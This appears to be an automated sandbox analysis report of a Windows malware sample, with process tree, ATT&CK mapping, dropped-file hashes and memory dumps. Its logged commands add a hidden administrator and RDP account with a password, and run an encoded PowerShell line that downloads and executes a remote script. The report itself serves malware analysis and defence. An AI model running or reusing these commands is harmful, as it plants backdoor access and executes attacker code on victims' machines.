cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:5052

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:3984

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD
1⤵
PID:3836

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD
2⤵
PID:4324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD
3⤵
PID:1084

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:3824

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
PID:1132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:2340

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc AOSzoi1P
1⤵
PID:4492

C:\Windows\system32\net.exe
net.exe user wgautilacc AOSzoi1P
2⤵
PID:2448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc AOSzoi1P
3⤵
PID:4860

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4872

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1452

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3340

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1864

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:2132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.dll
Filesize
3KB

MD5
d26a52fdd0d406f91aad441900651e14

SHA1
ae0747804ce277ed45b3e5bbdbe918b3f45c23f0

SHA256
08cc742d6cce43274fd3cc3b4dc7210fc9636624400a984a2fb79205451c8aa6

SHA512
af25ddc44217b32782680123927aba21accf761285812d5c6ff23d4f42fc6bbc3f1d07a47a900afaaf5763dea1208ee26850e4526272a5237aceffa5e4c42e0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEDDF.tmp
Filesize
1KB

MD5
5bbe07c9b2e799c41cb6b6b515ca8073

SHA1
38e4db880905ca9d9fef243ea7d4d274110aef7d

SHA256
313ab97945563ad3048ca11de1011301f4ed3c20677462ed3153be800b416299

SHA512
68750f3f95eca71e274113209911de7a5f29c2a021b527cbb40366b0ac28bda38a79ac93d6b2263db909ff4289f66ee7ce06eba0eaea49fb47e1bc5b12624929

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
Filesize
3.0MB

MD5
bcac3bbb18f093dbc8e5e76d2675695f

SHA1
96453f65b41e428937349e6f48fe67d6dfd6a580

SHA256
b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a

SHA512
78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip
Filesize
2.3MB

MD5
42c2a160d2d191e6ffcc1076b4734ee2

SHA1
c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49

SHA256
2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99

SHA512
3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939

Download Submit
C:\Windows\Branding\mediasrv.png
Filesize
55KB

MD5
f357d4e7b83bc0a41c65d97f3e6f50f4

SHA1
71db3180a8ada6d5d7722c54a5940c3490f78636

SHA256
db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba

SHA512
566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e

Download Submit
C:\Windows\Branding\mediasvc.png
Filesize
944KB

MD5
d5de6f599d9807bac2f5a8e751a8c38f

SHA1
9e70edf56b6a5768fda84232e9c557e750d3631b

SHA256
18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca

SHA512
e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5

Download Submit
C:\Windows\system32\rfxvmt.dll
Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.0.cs
Filesize
507B

MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.cmdline
Filesize
369B

MD5
8f1bbafbfab3cd4ffc56e35a9e4d0dcf

SHA1
1ae4efebf775275c207567c1026e771a2910788a

SHA256
c0f601ff829001efbc50c911eef95947d7e20eefb5fe36a09beca03625981c2a

SHA512
b1d802f777fcd9a3ec8343eca038ed1ee2cf76261262edbdd460d3de9d7ef73a61ebcd9151fc81900e0873153e3548ca437556ade3b3fa04af237a7add6cc43d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\CSC9AEA88AD1398439A97F918B61E789921.TMP
Filesize
652B

MD5
5713fd0890bda27ccdeb3986588563c4

SHA1
f85141760d3415da16f3decd58902045ba332f94

SHA256
4633d2a2e9fdb49ab242b7f4228986ebc5901a33df5b1929539bda6a59879a75

SHA512
9626ee201da4854974df2e7af297839390ae22287af3f9ce2bf9a140e299a433d3ba260cdf95a435f29caacc78f9dd43e654676ab88fedd074cb579bc872874d

Download Submit
memory/220-159-0x0000000000000000-mapping.dmp

Download
memory/404-152-0x0000000000000000-mapping.dmp

Download
memory/540-177-0x0000000000000000-mapping.dmp

Download
memory/952-175-0x0000000000000000-mapping.dmp

Download
memory/1084-181-0x0000000000000000-mapping.dmp

Download
memory/1088-165-0x0000000000000000-mapping.dmp

Download
memory/1108-140-0x0000000000000000-mapping.dmp

Download
memory/1132-182-0x0000000000000000-mapping.dmp

Download
memory/1452-186-0x0000000000000000-mapping.dmp

Download
memory/1648-154-0x0000000000000000-mapping.dmp

Download
memory/1756-134-0x000002482C330000-0x000002482C352000-memory.dmp

Filesize
136KB

Download
memory/1756-133-0x0000000000000000-mapping.dmp

Download
memory/1756-137-0x000002482C510000-0x000002482C512000-memory.dmp

Filesize
8KB

Download
memory/1756-139-0x000002482C516000-0x000002482C518000-memory.dmp

Filesize
8KB

Download
memory/1756-138-0x000002482C513000-0x000002482C515000-memory.dmp

Filesize
8KB

Download
memory/1756-136-0x00007FFDDBD90000-0x00007FFDDC851000-memory.dmp

Filesize
10.8MB

Download
memory/1976-155-0x0000000000000000-mapping.dmp

Download
memory/2132-188-0x0000000000000000-mapping.dmp

Download
memory/2156-164-0x0000000000000000-mapping.dmp

Download
memory/2200-147-0x0000000000000000-mapping.dmp

Download
memory/2240-187-0x0000000000000000-mapping.dmp

Download
memory/2332-162-0x0000000000000000-mapping.dmp

Download
memory/2340-183-0x0000000000000000-mapping.dmp

Download
memory/2448-184-0x0000000000000000-mapping.dmp

Download
memory/2940-158-0x0000000000000000-mapping.dmp

Download
memory/2964-167-0x0000000000000000-mapping.dmp

Download
memory/3156-163-0x0000000000000000-mapping.dmp

Download
memory/3348-168-0x0000000000000000-mapping.dmp

Download
memory/3352-173-0x0000000000000000-mapping.dmp

Download
memory/3412-172-0x0000000000000000-mapping.dmp

Download
memory/3500-150-0x0000000000000000-mapping.dmp

Download
memory/3512-151-0x0000000000000000-mapping.dmp

Download
memory/3712-143-0x0000000000000000-mapping.dmp

Download
memory/3860-149-0x0000000000000000-mapping.dmp

Download
memory/3964-178-0x0000000000000000-mapping.dmp

Download
memory/3984-179-0x0000000000000000-mapping.dmp

Download
memory/4028-166-0x0000000000000000-mapping.dmp

Download
memory/4068-174-0x0000000000000000-mapping.dmp

Download
memory/4120-160-0x0000000000000000-mapping.dmp

Download
memory/4232-156-0x0000000000000000-mapping.dmp

Download
memory/4324-180-0x0000000000000000-mapping.dmp

Download
memory/4368-189-0x0000000000000000-mapping.dmp

Download
memory/4368-193-0x0000019A42FC6000-0x0000019A42FC8000-memory.dmp

Filesize
8KB

Download
memory/4368-192-0x0000019A42FC3000-0x0000019A42FC5000-memory.dmp

Filesize
8KB

Download
memory/4368-191-0x0000019A42FC0000-0x0000019A42FC2000-memory.dmp

Filesize
8KB

Download
memory/4368-190-0x00007FFDDBB50000-0x00007FFDDC611000-memory.dmp

Filesize
10.8MB

Download
memory/4600-157-0x0000000000000000-mapping.dmp

Download
memory/4860-185-0x0000000000000000-mapping.dmp

Download
memory/4984-131-0x0000000000040000-0x00000000004F8000-memory.dmp

Filesize
4.7MB

Download
memory/4984-132-0x00000000029F0000-0x0000000002E9C000-memory.dmp

Filesize
4.7MB

Download
memory/4984-130-0x00000000026AC000-0x00000000029E9000-memory.dmp

Filesize
3.2MB

Download
memory/5004-153-0x0000000000000000-mapping.dmp

Download
memory/5064-176-0x0000000000000000-mapping.dmp

Download
memory/5096-161-0x0000000000000000-mapping.dmp

Download